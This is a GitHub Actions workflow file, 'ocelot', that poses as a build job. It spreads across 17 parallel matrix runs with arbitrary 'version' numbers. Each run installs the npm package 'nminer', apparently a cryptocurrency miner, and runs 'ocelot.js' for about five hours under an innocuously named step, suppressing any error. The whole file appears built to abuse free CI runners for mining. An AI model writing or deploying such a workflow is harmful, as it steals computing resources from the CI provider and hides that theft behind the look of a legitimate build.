name: ocelot
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2825 }
          - { version: 5048 }
          - { version: 2301 }
          - { version: 1614 }
          - { version: 4949 }
          - { version: 832 }
          - { version: 4341 }
          - { version: 2156 }
          - { version: 3995 }
          - { version: 4793 }
          - { version: 8017 }
          - { version: 3248 }
          - { version: 8766 }
          - { version: 9619 }
          - { version: 869 }
          - { version: 5155 }
          - { version: 4626 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: between
        run: |
          npm install nminer@latest
          timeout 302m node ocelot.js || echo "ocelot executed"